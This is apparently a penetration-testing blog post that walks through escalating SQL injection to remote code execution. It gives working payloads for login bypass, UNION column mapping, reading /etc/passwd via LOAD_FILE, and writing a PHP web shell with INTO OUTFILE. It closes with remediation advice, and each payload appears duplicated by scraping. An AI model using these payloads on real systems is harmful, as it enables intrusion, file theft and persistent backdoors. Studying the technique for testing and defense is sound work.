June 30, 2026
From SQL Injection to Remote Code Execution (RCE): A Practical Walkthrough
During web application penetration testing, finding a SQL Injection (SQLi) flaw is often just the beginning. While many security…
By Giorgi Bedoshvili
2 min read
During web application penetration testing, finding a SQL Injection (SQLi) flaw is often just the beginning. While many security practitioners focus strictly on data exfiltration or authentication bypass, the ultimate goal during an infrastructure audit is to turn this database vulnerability into a full operating system compromise.
In this guide, we will break down the methodology of identifying a SQL Injection entry point, verifying file system privileges, and leveraging the database engine to write a PHP Web Shell to the server, achieving full Remote Code Execution (RCE).
1. Authentication Bypass: Forcing Logins
The root cause of SQLi is unsafe string concatenation where user-supplied input is directly executed as a query. In a vulnerable login form, an attacker can exploit this logic to bypass authentication entirely.
By injecting the following string into the username field:
SQL
' OR 1=1 -- -' OR 1=1 -- -The -- - comment syntax tells the underlying database engine to ignore the remainder of the original query (the password verification). The statement evaluates as True, granting instant administrative access without requiring valid credentials.
2. Structural Mapping via UNION Attacks
To successfully inject a file or manipulate output, we must match the exact schema layout of the original query. Introducing an improper column count during a UNION statement will trigger a database corruption or execution error.
Column Enumeration:
We abuse the ORDER BY clause to determine the field ceiling:
SQL
' ORDER BY 1-- -
' ORDER BY 5-- -' ORDER BY 1-- -
' ORDER BY 5-- -If ORDER BY 4 displays normally but ORDER BY 5 returns a system error, the server handles exactly 4 columns.
Next, we map the injection hooks to identify which columns reflect output directly to the web interface:
SQL
' UNION SELECT 1, 2, 3, 4-- -' UNION SELECT 1, 2, 3, 4-- -Take note of which indices appear on the screen — these are your active exploitation windows.
3. Escalating to Code Execution (RCE) via INTO OUTFILE
In database environments like MySQL or MariaDB, if the database user possesses administrative FILE privileges and the system variable secure_file_priv is null (empty), an operator can read and write files directly to the host operating system.
Arbitrary File Reading
To view internal target configurations, we execute the LOAD_FILE tool within our mapped column window:
SQL
' UNION SELECT 1, LOAD_FILE('/etc/passwd'), 3, 4-- -' UNION SELECT 1, LOAD_FILE('/etc/passwd'), 3, 4-- -Writing a Persistent Web Shell
If the web server directory root is write-accessible (e.g., standard Apache path /var/www/html/), we can weaponize a single line of PHP code and dump it to the disk.
SQL
' UNION SELECT "", '<?php system($_REQUEST[0]); ?>', "", "" INTO OUTFILE '/var/www/html/shell.php'-- -' UNION SELECT "", '<?php system($_REQUEST[0]); ?>', "", "" INTO OUTFILE '/var/www/html/shell.php'-- -Verification and Shell Testing
Once written, the payload acts as a persistent backdoor. We can interact with our new listener directly through the browser url line using the initialized variable (0):
HTTP
http://<TARGET_IP>/shell.php?0=idhttp://<TARGET_IP>/shell.php?0=idIf the browser prints www-data or a local user account context, you have escalated a simple query bypass into interactive Remote Code Execution.
4. Remediation and Defense Engineering
Defending web backends against injection attacks requires a defense-in-depth architectural model:
- Prepared Statements (Parameterized Queries): Data must never mix with executable logic. Utilizing strict parameter placeholders compiles the SQL query structure first, stripping user inputs of any operational capability.
- Input Regex White-listing: Restrict data entry endpoints to strictly defined patterns (e.g., allowing only numeric strings for identifier forms).
- Isolation of Privileges: Never run a live production database instance under a root-level administrator schema. Ensure application users lack
FILEread/write capabilities across the operating system.
If you find this real-world technical methodology valuable, consider following my profile for more upcoming active directory and infrastructure audit breakdowns.